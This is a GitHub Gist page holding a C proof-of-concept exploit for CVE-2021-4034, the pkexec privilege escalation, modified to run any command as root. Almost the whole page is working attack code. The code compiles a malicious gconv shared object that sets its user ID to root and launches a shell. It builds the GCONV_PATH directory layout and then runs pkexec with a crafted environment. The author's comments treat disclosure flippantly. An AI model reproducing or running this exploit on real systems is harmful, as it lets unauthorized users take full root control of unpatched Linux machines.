Last active
January 27, 2022 18:55
-
-
Save tothi/c3c1db7addd4841fd8febb2c74fe1899 to your computer and use it in GitHub Desktop.
CVE-2021-4034
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* blasty-vs-pkexec-mod.c -- by blasty <[email protected]> | |
* ------------------------------------------------ | |
* PoC for CVE-2021-4034, shout out to Qualys | |
* | |
* ctf quality exploit | |
* | |
* bla bla irresponsible disclosure | |
* | |
* -- blasty // 2022-01-25 | |
* | |
* non-interactive support: if passed an argument, it will launch that cmd instead of interactive sh | |
* | |
* -- modified by an0n // 2022-01-27 | |
* | |
* ./blasty-vs-pkexec-mod cmd_with_params_to_launch_as_root | |
* | |
*/ | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <sys/stat.h> | |
#include <sys/types.h> | |
#include <fcntl.h> | |
void fatal(char *f) { | |
perror(f); | |
exit(-1); | |
} | |
void compile_so(char *arg) { | |
FILE *f = fopen("payload.c", "wb"); | |
if (f == NULL) { | |
fatal("fopen"); | |
} | |
char so_code_template[]= | |
"#include <stdio.h>\n" | |
"#include <stdlib.h>\n" | |
"#include <unistd.h>\n" | |
"void gconv() {\n" | |
" return;\n" | |
"}\n" | |
"void gconv_init() {\n" | |
" setuid(0); seteuid(0); setgid(0); setegid(0);\n" | |
" static char *a_argv[] = { \"sh\", \"-c\", \"%s\", NULL };\n" | |
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n" | |
" execve(\"/bin/sh\", a_argv, a_envp);\n" | |
" exit(0);\n" | |
"}\n"; | |
char *so_code = malloc(sizeof so_code_template + strlen(arg)); | |
sprintf(so_code, so_code_template, arg); | |
fwrite(so_code, strlen(so_code), 1, f); | |
fclose(f); | |
system("gcc -o payload.so -shared -fPIC payload.c"); | |
} | |
int main(int argc, char *argv[]) { | |
struct stat st; | |
char *a_argv[]={ NULL }; | |
char *a_envp[]={ | |
"lol", | |
"PATH=GCONV_PATH=.", | |
"LC_MESSAGES=en_US.UTF-8", | |
"XAUTHORITY=../LOL", | |
NULL | |
}; | |
printf("[~] compile helper..\n"); | |
if (argc < 2) { | |
printf("[~] using 'sh' as payload\n"); | |
compile_so("sh"); | |
} else { | |
printf("[~] launching '%s'\n", argv[1]); | |
compile_so(argv[1]); | |
} | |
if (stat("GCONV_PATH=.", &st) < 0) { | |
if(mkdir("GCONV_PATH=.", 0777) < 0) { | |
fatal("mkdir"); | |
} | |
int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777); | |
if (fd < 0) { | |
fatal("open"); | |
} | |
close(fd); | |
} | |
if (stat("lol", &st) < 0) { | |
if(mkdir("lol", 0777) < 0) { | |
fatal("mkdir"); | |
} | |
FILE *fp = fopen("lol/gconv-modules", "wb"); | |
if(fp == NULL) { | |
fatal("fopen"); | |
} | |
fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n"); | |
fclose(fp); | |
} | |
printf("[~] maybe got root cmdexec now?\n"); | |
execve("/usr/bin/pkexec", a_argv, a_envp); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment